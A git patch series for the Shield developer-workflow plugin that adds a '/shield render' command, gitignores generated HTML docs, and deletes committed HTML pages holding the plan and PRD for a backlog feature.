+                         capture_output=True, text=True)
+    assert res.returncode == 2
+    assert "not a dir" in res.stderr

From af977e135117e7d160e1518be33bad164b0a9a61 Mon Sep 17 00:00:00 2001
From: ashwinimanoj
Date: Mon, 8 Jun 2026 08:26:05 +0000
Subject: [PATCH 05/10] feat(shield): /shield render command triggers render-output.sh

Co-Authored-By: Claude Opus 4.7 (1M context)
---
 shield/commands/render.md | 37 +++++++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 shield/commands/render.md

diff --git a/shield/commands/render.md b/shield/commands/render.md
new file mode 100644
index 00000000..9b4800cd
--- /dev/null
+++ b/shield/commands/render.md
@@ -0,0 +1,37 @@
+---
+name: render
+description: Build the browsable Shield HTML site locally from committed Markdown
+args: "[output dir — optional, defaults to docs/shield]"
+---
+
+# Render Shield Output
+
+Shield commits Markdown + JSON sidecars only. HTML (per-artifact pages and the
+browsable dashboard) is a **local build artifact** — gitignored and regenerated
+on demand. Run this command to (re)build the site, then open the HTML locally.
+
+## Usage
+
+`/shield render` — rebuild the whole site under `docs/shield/`
+`/shield render ` — rebuild a site rooted at a custom dir
+
+## Behavior
+
+1. Run the build script, which renders every source `.md` to its
+   `outputs/*.html` and then writes the dashboard (`index.html`) and shared
+   assets (`manifest.js`, CSS, nav JS):
+
+   ```bash
+   "$CLAUDE_PLUGIN_ROOT/scripts/render-output.sh" "$ARGUMENTS"
+   ```
+
+   (`$ARGUMENTS` is empty for the default `docs/shield/` location.)
+
+2. Report the built site path and remind the user the output is gitignored —
+   open `docs/shield/index.html` in a browser to view.
+
+## Important
+
+- This command does NOT author or modify any Markdown — it only renders.
+- HTML is never committed; do not `git add` anything under `outputs/` or the
+  generated root assets.

From 9f71371585e5ac1910ed711506ebe6352e18196a Mon Sep 17 00:00:00 2001
From: ashwinimanoj
Date: Mon, 8 Jun 2026 08:27:16 +0000
Subject: [PATCH 06/10] build(shield): gitignore HTML build artifacts; untrack committed HTML

Co-Authored-By: Claude Opus 4.7 (1M context)
---
 .gitignore | 11 +
 .../shield/backlog-20260527/outputs/plan.html | 221 -----
 docs/shield/backlog-20260527/outputs/prd.html | 392 --------
 .../plan/2026-05-27/detailed/agile-coach.html | 308 -------
 .../2026-05-27/detailed/backend-engineer.html | 113 ---
 .../plan/2026-05-27/detailed/dx-engineer.html | 172 ----
 .../2026-05-27/detailed/product-manager.html | 196 ----
 .../detailed/security-engineer.html | 176 ----
 .../reviews/plan/2026-05-27/detailed/sre.html | 129 ---
 .../plan/2026-05-27/enhanced-plan.html | 274 ------
 .../reviews/plan/2026-05-27/summary.html | 235 -----
 .../plan/2026-05-29/detailed/agile-coach.html | 133 ---
 .../2026-05-29/detailed/backend-engineer.html | 99 ---
 .../plan/2026-05-29/detailed/dx-engineer.html | 159 ----
 .../2026-05-29/detailed/product-manager.html | 109 ---
 .../detailed/security-engineer.html | 170 ----
 .../reviews/plan/2026-05-29/detailed/sre.html | 145 ---
 .../plan/2026-05-29/enhanced-plan.html | 207 -----
 .../reviews/plan/2026-05-29/summary.html | 206 -----
 .../reviews/prd/2026-05-27/enhanced-prd.html | 316 -------
 .../reviews/prd/2026-05-27/summary.html | 241 -----
 .../prd/2026-05-27_2/enhanced-prd.html | 364 --------
 .../reviews/prd/2026-05-27_2/summary.html | 203 -----
 docs/shield/backlog-20260527/outputs/trd.html | 531 -----------
 .../outputs/research.html | 324 -------
 docs/shield/index.html | 33 -
 docs/shield/manifest.js | 161 ----
 .../outputs/plan-architecture.html | 162 ----
 .../outputs/plan.html | 430 ---------
 .../outputs/research.html | 837 ------------------
 .../plan/2026-05-25/detailed/agile-coach.html | 165 ----
 .../plan/2026-05-25/detailed/architect.html | 149 ----
 .../2026-05-25/detailed/backend-engineer.html | 165 ----
 .../plan/2026-05-25/detailed/dx-engineer.html | 216 -----
 .../reviews/plan/2026-05-25/detailed/sre.html | 148 ----
 .../plan/2026-05-25/enhanced-plan.html | 396 ---------
 .../reviews/plan/2026-05-25/summary.html | 411 ---------
 docs/shield/shield-dashboard.js | 62 --
 docs/shield/shield-nav.js | 160 ----
 docs/shield/shield.css | 81 --
 .../scripts/test_gitignore_html_artifacts.py | 29 +
 41 files changed, 40 insertions(+), 8999 deletions(-)
 delete mode 100644 docs/shield/backlog-20260527/outputs/plan.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/prd.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/trd.html
 delete mode 100644 docs/shield/devcontainer-implement-20260518/outputs/research.html
 delete mode 100644 docs/shield/index.html
 delete mode 100644 docs/shield/manifest.js
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/plan.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/research.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html
 delete mode 100644 docs/shield/shield-dashboard.js
 delete mode 100644 docs/shield/shield-nav.js
 delete mode 100644 docs/shield/shield.css
 create mode 100644 shield/scripts/test_gitignore_html_artifacts.py

diff --git a/.gitignore b/.gitignore
index b091540e..c8a5a65a 100644
--- a/.gitignore
+++ b/.gitignore
@@ -41,3 +41,14 @@ shield/tests/output/
 # outputs/, and reviews/ (see docs/superpowers/plans/2026-05-22-shield-output-
 # structure-cutover.md). Only the hidden Q&A scratch transcript is disposable.
 **/docs/shield/*/.session-transcript.md
+
+# Shield HTML is a BUILD ARTIFACT, not a source. Markdown + JSON sidecars are
+# the committed source of truth. Regenerate the site locally with /shield
+# render (scripts/render-output.sh). See docs/superpowers/specs/
+# 2026-06-08-shield-single-canonical-output-design.md
+**/docs/shield/*/outputs/
+**/docs/shield/index.html
+**/docs/shield/manifest.js
+**/docs/shield/shield.css
+**/docs/shield/shield-nav.js
+**/docs/shield/shield-dashboard.js
diff --git a/docs/shield/backlog-20260527/outputs/plan.html b/docs/shield/backlog-20260527/outputs/plan.html
deleted file mode 100644
index 57e67c4b..00000000
--- a/docs/shield/backlog-20260527/outputs/plan.html
+++ /dev/null
@@ -1,221 +0,0 @@
-
-
-
-
-
-Plan — backlog-20260527
-
-
-
-
-
-
-
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - - -

Plan — Shield Backlog

-

Project: Shield · Phase: v1 · Domain: backend (Python) -PRD: ./prd.md (reviewed Ready, composite 3.12) · TRD: ./trd.md · Sidecar: ./plan.json

-

A project-level Shield backlog: capture (user/agent) → user-driven promotion → reconciliation. Entries are removed when their work commits — eagerly at the end of a promoted /plan or /implement run, lazily on the /backlog view sweep, or manually. Matching is by feature (manifest.json index) + epic (plan.json gate); no ids are stamped. This re-plan folds the 2026-05-27 plan-review findings (P0 gate-0d, the P1/P2 set) into the stories and adds the previously-deferred 14-section TRD plus three component LLD drafts.

-

Milestones

| ID | Name | Depends on | Touches LLD | Outcome |
|---|---|---|---|---|
| M1 | Capture + store + view | | backlog-store | backlog.json + schema/validator; capture (user + skill, atomic, validate-or-refuse); /backlog ordered view with manifest status badges; manual remove. |
| M2 | Feature + epic association + suggestion | M1 | epic-suggester | Every entry carries feature + epic (existing or proposed-new); agent suggests via exact-normalized match; user accept/replace/create-new. |
| M3 | Promotion + reconciliation | M2 | reconciler | Promotion via transient reference; reconciliation engine (single "epic landed" predicate matching by epic name, never-remove-on-doubt, drift tolerance, removal logging); eager + lazy idempotent triggers + kill switch (incl. shield.schema.json backlog key); eval suite + version bump. |
-

LLD drafts emitted by this plan (feature-folder, net-new): lld-backlog-store.md, lld-epic-suggester.md, lld-reconciler.md.

-
-

EPIC-1 — Store, schema & capture (M1)

-

EPIC-1-S1 · Define backlog.json schema and validator (high)

-

Define backlog.json shape + JSON Schema with a top-level schema_version, plus a Python validator. Entry: {id, order:int, kind∈{epic,story,task}, source∈{user,agent}, feature, epic, text}. schema_version is set now so future shape changes migrate read-old/write-new.

-
    -
  • Tasks: author shield/schema/backlog.schema.json; specify the id contract (uuid4 string; uniqueness across entries[] enforced by the validator, not the JSON Schema — P1-2 — since draft 2020-12 can't express property-level array uniqueness); document entry shape, migration policy, and the manifest features[].name == folder-slug invariant (P1-3) in shield/skills/general/backlog/SKILL.md; create shield/scripts/validate_backlog.py; ordering = single integer order; migration is doc-only until schema_version 2.
  • -
  • AC: schema rejects unknown kind (named error); the validator rejects duplicate id values (duplicate_entry_id); validate_backlog.py exits 0/non-zero correctly; schema_version + migration policy + name==slug invariant documented; enums constrained; id is a uuid4 string.
  • -
  • Design: §11 APIs Involved · LLD backlog-store §4 Data model
  • -
-
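The id-uniqueness rule in the tasks above lives in the validator rather than in the JSON Schema. A minimal sketch of that check follows, assuming a top-level `entries` list and the entry fields listed for EPIC-1-S1. Only `duplicate_entry_id` is named in this plan; the function name `validate_backlog_doc` and every other error code here are hypothetical.

```python
import uuid

ALLOWED_KINDS = {"epic", "story", "task"}
ALLOWED_SOURCES = {"user", "agent"}


def _is_uuid4(value: object) -> bool:
    """True only for a string that parses as a version-4 UUID."""
    if not isinstance(value, str):
        return False
    try:
        return uuid.UUID(value).version == 4
    except ValueError:
        return False


def validate_backlog_doc(doc: dict) -> list[str]:
    """Return error codes for a parsed backlog document; empty means valid.

    Hypothetical helper: the real validate_backlog.py may be shaped differently.
    """
    errors: list[str] = []
    if "schema_version" not in doc:
        errors.append("missing_schema_version")  # hypothetical code
    seen_ids: set[str] = set()
    for entry in doc.get("entries", []):
        entry_id = entry.get("id")
        if not _is_uuid4(entry_id):
            errors.append("invalid_entry_id")  # hypothetical code
        elif entry_id in seen_ids:
            # Cross-entry uniqueness: the check the plan assigns to the validator.
            errors.append("duplicate_entry_id")
        else:
            seen_ids.add(entry_id)
        if entry.get("kind") not in ALLOWED_KINDS:
            errors.append("unknown_kind")  # hypothetical code
        if entry.get("source") not in ALLOWED_SOURCES:
            errors.append("unknown_source")  # hypothetical code
        order = entry.get("order")
        if not isinstance(order, int) or isinstance(order, bool):
            errors.append("invalid_order")  # hypothetical code
    return errors
```

A command-line wrapper could exit 0 when the returned list is empty and non-zero otherwise, which is the exit behaviour the acceptance criteria ask for.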

EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write (high)

-

Capture usable by the user (/backlog add) and any skill (documented capture() write helper). Atomic temp-then-rename + validate-or-refuse so concurrent capture vs reconciliation can't corrupt the file. Resolves PRD-review P1 (capture interface); closes TRD §12 Q3.

-
    -
  • Tasks: /backlog add (assigns next order + uuid4 id); LOCKED write-helper signature capture(text: str, *, kind: str = "task", feature: str | None = None, epic: str | None = None, source: str) -> str in shield/scripts/backlog_store.py, raising BacklogInvalid (pinned TRD §11); LOCKED single-writer (no lock) → full doc → .tmp → os.replace() (TRD §6 N1); + compare-before-replace (P1-1/security): refuse os.replace() if the on-disk store changed since read → loud BacklogInvalid, no lost entry; package backlog_store with a pyproject.toml (P1-4 — skills import capture()); validate-or-refuse on read and write.
  • -
  • AC: user + skill capture both work; interface documented + pinned in TRD §11; mid-write kill leaves no corruption; a concurrent on-disk change between read and replace is refused with BacklogInvalid (no lost entry); next order/uuid4 id/default kind assigned; malformed/partial backlog.json on read is refused with BacklogInvalid, never silently read or truncated.
  • -
  • Design: §5 Functional Requirements · LLD backlog-store §5 API contracts
  • -
-

EPIC-1-S3 · /backlog view — ordered list (high)

-

/backlog command + skill rendering entries sorted by order with feature + epic + source.

-
    -
  • Tasks: author shield/commands/backlog.md + backlog/SKILL.md; render sorted by order; define the per-entry render-line format once in the SKILL.md (canonical badge string lives in EPIC-2-S1) so every view path renders identically; document a local-dev/dry-run loop; empty-backlog message.
  • -
  • AC: ascending-order list with feature/epic/source; clean empty message; command registered; render-line format documented once and reused.
  • -
  • Design: §4 Product Journey
  • -
-

EPIC-1-S4 · Manual remove from /backlog (medium)

-

/backlog remove <id> — plain delete for ideas decided against / entries no run will clear.

-
    -
  • Tasks: remove <id> via atomic helper; confirm-before-delete; clear error on absent id; document the recoverability boundary (git revert covers only committed entries; uncommitted manual remove is unrecoverable by design — N4).
  • -
  • AC: deletes + persists atomically; absent id = clear no-op error; no history retained; uncommitted-entry recoverability caveat documented.
  • -
  • Design: §5 Functional Requirements · LLD backlog-store §5 API contracts
  • -
-
-

EPIC-2 — Association & pipeline status

-

EPIC-2-S1 · Per-entry pipeline status from manifest.json (high, M1)

-

/backlog view shows each entry's feature pipeline status (research/prd/plan) read live from manifest.json — so "prd done, not yet planned" is visible without removal.

-
    -
  • Tasks: read manifest; render status badges per entry; pin the canonical badge string research ✓ prd ✓ plan – in the SKILL.md; not started when feature absent; compute at view time (no stored status).
  • -
  • AC: badges derived from manifest using the pinned string; prd-but-no-plan shows prd ✓ plan – and stays; absent feature → not started.
  • -
  • Design: §7 High-Level Design
  • -
-

EPIC-2-S2 · Feature + epic association + agent suggestion (high, M2)

-

Associate every entry with a feature (reconciliation key) + epic (removal gate), either proposed-new; agent suggests feature (manifest) + epic (plan.json); user accept/replace/create-new.

-
    -
  • Tasks: prompt/accept feature + epic (allow proposed-new); LOCKED match key = exact normalized (casefold() + collapsed whitespace); UPDATED (P0-2): both existing and proposed-new epics match by exact normalized NAME (epic id EPIC-N is a positional within-plan slot, not a cross-plan key), no fuzzy ranking (TRD §5 F7/F8); suggestion typed against the real shapes (P0-1): suggest_feature reads manifest.features[].name, suggest_epic reads plans[feature].epics[] (plans = dict[slug→plan], path derived); never block capture; a tie (≥2 matches) surfaces all and auto-picks none.
  • -
  • AC: every entry has feature + epic; ≥1 feature + ≥1 epic candidate proposed when matches exist; auth fixture surfaces auth top candidate + 2-way tie auto-picks neither; a suggested feature value resolves to an existing docs/shield/<value>/ path; capture succeeds with proposed-new when none.
  • -
  • Design: §5 Functional Requirements · LLD epic-suggester §5 API contracts
  • -
-
-

EPIC-3 — Promotion & reconciliation (M3)

-

EPIC-3-S1 · User-driven promotion with transient reference (high)

-

/backlog promote <id> launches the user-chosen step (/research, /prd, /plan, or /implement) and passes the entry id as a transient runtime reference — never stamped into plan.json.

-
    -
  • Tasks: promote <id> affordance; forward id as transient reference; document non-persistence; shippable work routes through /plan, direct /implement for rare planless one-offs.
  • -
  • AC: promotion starts the chosen step + forwards the reference; reference not persisted to plan.json/stories (F6); tool never auto-routes.
  • -
  • Design: §4 Product Journey
  • -
-
-

Intra-epic dependency: EPIC-3-S3 (triggers) consumes both EPIC-3-S1 (transient reference) and EPIC-3-S2 (engine) and must land after them.

-
-

EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) (high)

-

Locate feature in manifest.json; if it has a plan.json, apply the single "epic landed" predicate (TRD §5 F8): remove iff an epic with the matching normalized-exact name is present in plan.json.epics[] — story status is never consulted. Ambiguity/no-match → entry stays. Unknown manifest/plan shapes → doubt (stays), never crash.

-
    -
  • Tasks: shield/scripts/reconcile_backlog.py with reconcile(entry, *, manifest: dict, plans: dict[str,dict]) -> RemovalDecision (pure fn; manifest = list-keyed features[], plans = {slug→plan} with path derived — P0-1); UPDATED (P0-2) match key = epic by casefold+collapsed-ws exact name for both existing and proposed-new (never by positional EPIC-N id; a re-planned reorder must still resolve); tie/no-match → stays; story status never consulted; never-remove-on-doubt; drift tolerance with logged warning; define RemovalDecision + log every removal {entry id, feature, epic, match-kind (name), triggering run, gating plan.json path}.
  • -
  • AC: removed only when an epic with normalized-exact name is present in plan.json.epics[] (story status not consulted), prd-only not; a re-planned epic reorder (same name, new EPIC-N) still resolves; epic-name collision across two features → ambiguous → entry stays; malformed/old shapes → entry stays (logged), no exception; every removal emits the structured log line.
  • -
  • Design: §7 High-Level Design · LLD reconciler §6 Sequence flows
  • -
-
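The "epic landed" predicate and the never-remove-on-doubt rule above can be sketched as a pure function. The signature follows the one quoted in the tasks; the fields of `RemovalDecision`, the reason strings, and the assumption that each plan epic carries a `name` key are hypothetical. This sketch only detects ambiguity inside one feature's plan, not the cross-feature collision case.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class RemovalDecision:
    remove: bool
    reason: str  # hypothetical field; the plan only names the type


def _norm(name: str) -> str:
    return " ".join(name.casefold().split())


def reconcile(entry: dict, *, manifest: dict, plans: dict[str, dict]) -> RemovalDecision:
    """Remove only when exactly one epic with the entry's normalized name exists."""
    try:
        feature_key = _norm(entry["feature"])
        epic_key = _norm(entry["epic"])
        features = [f for f in manifest["features"] if _norm(f["name"]) == feature_key]
        if len(features) != 1:
            return RemovalDecision(False, "feature_not_unique")
        plan = plans.get(features[0]["name"])
        if plan is None:
            # A prd-only feature has no plan.json, so the entry stays.
            return RemovalDecision(False, "no_plan")
        hits = [e for e in plan["epics"] if _norm(e["name"]) == epic_key]
    except (KeyError, TypeError, AttributeError):
        # Unknown or drifted shapes count as doubt: keep the entry, never crash.
        return RemovalDecision(False, "unreadable_shape")
    if len(hits) == 1:
        return RemovalDecision(True, "epic_landed")
    return RemovalDecision(False, "ambiguous_or_no_match")
```

Story status is never read here, and the positional `EPIC-N` id plays no part in the match, so a re-planned reorder that keeps the epic name still resolves.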

EPIC-3-S3 · Eager + lazy removal triggers (idempotent) + kill switch (high)

-

Eager prune at end of promoted /plan or /implement (via the transient reference); lazy sweep on /backlog view. Both idempotent; both call the one reconciliation engine. Ships the kill switch and closes the uncommitted-state recovery gap. Lands after EPIC-3-S1 + EPIC-3-S2.

-
    -
  • Tasks: eager prune hook at end of /plan + /implement; lazy sweep on view; idempotent remove-if-present + shared engine; kill switch .shield.json backlog.auto_reconcile (default true) disabling eager + lazy (§14 rollback fallback) — requires an additive backlog object in shield/schemas/shield.schema.json (P0-3; current schema is additionalProperties:false); RESOLVED (P1-1) the single recovery mechanism is append-to-.shield/backlog-removed.log before the destructive prune (commit-before-prune is a non-goal); no-op prune writes no log/recovery record; instrument the N2 ~1s budget with a debug-gated latency line (WARN > 1s).
  • -
  • AC: promotion removes referenced entry at end of run (eager); sweep removes plan-committed entries (lazy); second pass is a no-op (idempotent); shared engine; backlog.auto_reconcile=false (now schema-valid) disables both, leaving manual-remove; end-of-run prune appends to .shield/backlog-removed.log before remove; replay restores the entry; debug latency line reports view+sweep wall time + WARN above 1s.
  • -
  • Design: §7 High-Level Design · LLD reconciler §8 Concurrency & state
  • -
-
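The ordering in the tasks above (append to the removed log first, prune second, and write nothing on a no-op) can be sketched as below. `prune_entry` and `replay_removed` are hypothetical names, the one-JSON-object-per-line log format is an assumption, and the plain `write_text` call stands in for the atomic store helper to keep the sketch short.

```python
import json
from pathlib import Path


def prune_entry(store: Path, removed_log: Path, entry_id: str) -> bool:
    """Idempotent remove-if-present; returns True only when an entry was removed."""
    doc = json.loads(store.read_text(encoding="utf-8"))
    victim = next((e for e in doc["entries"] if e["id"] == entry_id), None)
    if victim is None:
        return False  # no-op prune: no log line, no store write
    removed_log.parent.mkdir(parents=True, exist_ok=True)
    # Log before the destructive step, so a crash in between is still recoverable.
    with removed_log.open("a", encoding="utf-8") as log:
        log.write(json.dumps(victim) + "\n")
    doc["entries"] = [e for e in doc["entries"] if e["id"] != entry_id]
    store.write_text(json.dumps(doc, indent=2), encoding="utf-8")
    return True


def replay_removed(store: Path, removed_log: Path) -> int:
    """Restore logged entries that are missing from the store; returns the count."""
    doc = json.loads(store.read_text(encoding="utf-8"))
    present = {e["id"] for e in doc["entries"]}
    restored = 0
    for line in removed_log.read_text(encoding="utf-8").splitlines():
        entry = json.loads(line)
        if entry["id"] not in present:
            doc["entries"].append(entry)
            present.add(entry["id"])
            restored += 1
    store.write_text(json.dumps(doc, indent=2), encoding="utf-8")
    return restored
```

Calling `prune_entry` a second time for the same id returns `False` and leaves both files untouched, which is the idempotency that the eager and lazy triggers both rely on.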
-

EPIC-4 — Eval coverage & release (M3)

-

EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) (high)

-

Per CLAUDE.md eval mandate: cover capture (user + skill), view + status, manual remove, eager prune, lazy sweep, match-key, never-remove-on-doubt, concurrency (no lost entry), no-stamping (F6), recovery-rehearsal.

-
    -
  • Tasks: fixtures from the real artifact schemas (P0-1: list-keyed manifest.features[], boolean plan_json flag) covering prd-only-stays, plan-committed-removed, ambiguous-stays (epic-name collision across features), malformed-stays, re-planned-epic-reorder-still-resolves (same name, new EPIC-N — P0-2); evals incl. duplicate-id rejection; concurrency/lost-update eval (P1-1: a concurrent on-disk change between read and os.replace() is refused with BacklogInvalid — no corruption, no lost entry); write-side eval (P1-b: capture() producing a schema-invalid doc refuses, byte-unchanged); no-stamping eval (F6); recovery-rehearsal eval (P1-c: crash at the ordering seam — after log-append, before remove — still recoverable via replay); name a concrete CI entrypoint (the actual workflow file + runner) + path-filter glob (shield/{schema,scripts,skills/general/backlog}/**, shield/commands/backlog.md).
  • -
  • AC: suite under shield/evals/ covers all listed behaviors (incl. re-plan reorder, lost-update detection, write-side refusal, ordering-seam recovery); fixtures use real manifest/plan shapes; self-contained (no API/LLM); PR body has RED + GREEN; the named CI workflow runs on the backlog-asset glob.
  • -
  • Design: §10 Milestones
  • -
-

EPIC-4-S2 · Version bump + command/skill docs (medium)

-

Bump the Shield plugin version (marketplace.json + pyproject where touched) in the same commit as asset changes; finalize /backlog + backlog SKILL.md docs.

-
    -
  • Tasks: bump marketplace.json; bump backlog_store pyproject.toml (unconditional — P1-4, it's a packaged module); commit the shield/schemas/shield.schema.json backlog change (P0-3) in the same commit; finalize command/skill docs (capture, three triggers, kill switch, name match key, manual remove, badges, wrong-removal recovery procedure); document a fixed monthly /backlog audit with the concrete PRD §7 revisit triggers (<70% terminal in 30d, or >20% untouched >60d); add explicit DoD lines ("PR reviewed and merged", "marketplace version published"); CHANGELOG.
  • -
  • AC: version bumped in marketplace.json + backlog_store pyproject.toml and the shield.schema.json change committed, all in one commit; command + SKILL document capture/view/promote/remove + 3 triggers + kill switch + recovery procedure + fixed monthly audit with numeric triggers; explicit DoD lines present; CHANGELOG mentions the feature.
  • -
  • Design: §13 References
  • -
-
-

Validate the bet from v1 data (P1 — PM10, decided 2026-05-27)

-

No pre-build baseline gate. The load-bearing assumption (PRD §10: lost future-work volume is high enough to justify the tool) is accepted for v1 and validated after M1 ships, from backlog.json's own add/remove git history over the first 30 days (the §7 success metric). If that data shows the backlog isn't earning its keep, revisit scope before investing further in M2/M3.

-

Carried forward from PRD-review (Ready, run _2)

-
    -
  • Capture-from-skill interface defined → EPIC-1-S2 / TRD §11 (closed — F3 signature locked).
  • -
  • backlog.json schema_version + migration → EPIC-1-S1 / TRD §9.
  • -
  • Reconciliation read-contract drift tolerance → EPIC-3-S2 / TRD §6 N3.
  • -
  • Eager-prune + lazy-sweep idempotency → EPIC-3-S3 / TRD §5 F9.
  • -
-

Next steps

-
    -
  • /plan-review — re-run multi-agent review on the refreshed plan + new TRD.
  • -
  • /pm-sync — sync epics + stories to ClickUp.
  • -
  • /implement — begin TDD implementation at M1 / EPIC-1-S1.
  • -
- -
-
Generated by Shield
-
-
diff --git a/docs/shield/backlog-20260527/outputs/prd.html b/docs/shield/backlog-20260527/outputs/prd.html
deleted file mode 100644
index 928f91ec..00000000
--- a/docs/shield/backlog-20260527/outputs/prd.html
+++ /dev/null
@@ -1,392 +0,0 @@
-
-
-
-
-
-PRD — backlog-20260527
-
-
-
-
-
-
-

Shield Backlog

-

1. Header

| Field | Value |
|---|---|
| Owner | @ashwinimanoj |
| Status | Draft |
| PRD type | Lean |
| Date created | 2026-05-27 |
| Last updated | 2026-05-27 |
| Linked design spec | null |
| Linked research | null |
| Decision-maker | @ashwinimanoj |
| Sign-off contacts | (n/a for internal tooling) |
| Linked plans | (auto-populated by /plan) |
-

2. Terminologies

| Term | Definition |
|---|---|
| Backlog | A project-level, ordered list of future work captured across the Shield workflow. Lives at docs/shield/backlog.json. |
| Backlog entry | One captured idea — a future epic, story, or task. May not be actionable when captured. Carries an order, a kind hint (epic \| story \| task), a source (user \| agent), and a feature + epic association (either may be proposed-new until promotion). |
| Feature association | The feature an entry belongs to (a docs/shield/<feature>/ folder). It is the reconciliation key: manifest.json is keyed by feature, so this is how an entry is matched to its pipeline progress. May be proposed-new until promotion. |
| Epic association | The epic an entry slots into when planned — an existing epic id (e.g. EPIC-2) or a proposed new epic. Acts as the gate at reconciliation: the entry is removed when this epic's work appears in the feature's plan.json (or removed manually — see §9). |
| Promotion | Acting on a backlog entry by starting the appropriate Shield step for it — /research, /prd, /plan, or /implement. The user decides which step; the backlog does not auto-route. |
| Reconciliation | Keeping the backlog current: manifest.json locates the entry's feature and whether it has a plan.json; if so, the entry's epic is looked up there. The entry is removed once its epic's work appears in the feature's plan.json (epics[].stories[]). No ids are stamped — matching is by feature (manifest) + epic (plan): an existing-epic entry matches by epic id, a proposed-new-epic entry matches by epic name (names expected stable). On any ambiguity or no match, the entry stays — reconciliation never removes on doubt. A prd-only feature does not trigger removal. Removal fires at the end of the /plan or /implement run promoted from the entry, or on the /backlog view sweep. |
| Agent-discovered entry | A backlog entry the agent adds on its own when it notices future work mid-task (vs. a user-created entry). |
-

3. Problem & context

-

Future work surfaces constantly while using Shield — during /research, while writing a PRD, mid-/plan, and especially during /implement ("we should also handle X later", "this whole area needs a rewrite"). Today there is nowhere to park that work. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.

-

Concretely:

-
    -
  • There is no project-level, ordered place to capture "not now, but later" items. plan.json only holds work already committed to a milestone; manifest.json is an artifact index. Neither captures un-triaged future work.
  • -
  • Ideas discovered by the agent mid-task have no home — they're mentioned once in conversation and gone.
  • -
  • When future work is remembered, there's no consistent path from "loose idea" to "stories in a plan." Each pickup re-derives the epic, the feature, and the scope from scratch.
  • -
-

Why now: Shield's pipeline (/research → /prd → /plan → /implement) is mature, but it only handles work that's already been decided on. The gap is the staging area before that pipeline — where future work waits, ordered, until the user promotes it in.

-

4. Target users / personas

| ID | Persona | Goals | Frictions today |
|---|---|---|---|
| P1 | Ashwini — Shield maintainer running /research, /plan, and /implement daily | Capture future work without losing focus on the current task; come back later to an ordered list of what to pick up next | Future ideas get lost or derail the current task; no ordered "later" list at the project level |
| P2 | The agent (Claude) running a Shield task | Record follow-up work it discovers mid-task so the human doesn't have to remember it | Discovered work is mentioned once in chat then forgotten; no place to persist it |
-

5. Architecture & flows

-

A single global store docs/shield/backlog.json (sibling to manifest.json), a /backlog command to view it, a capture path usable from any Shield skill or by the user, and a user-driven promotion: the user picks an entry and starts whichever Shield step fits — /research, /prd, /plan, or /implement. Each entry carries an order, a source (user | agent), and a feature + epic association. Reconciliation reads manifest.json as the project-level index — to find each entry's feature, see whether it has a plan.json, and surface its pipeline status (research/prd/plan) in the /backlog view — then opens the flagged plan.json and removes any entry whose epic's work now appears there. A prd-only feature stays in the backlog; only committed work is removed. No ids are tracked. An entry promoted via /plan or /implement is pruned at the end of that run (the command carries the entry as a transient promotion reference); the /backlog view sweep is the lazy safety net for work that landed without an explicit reference; and a manual remove clears ideas decided against or anything not tied to a promotion run.

-
flowchart LR
-  cap["Capture<br/>(user or agent, anytime)"] --> bl["backlog.json<br/>(ordered, project-level)"]
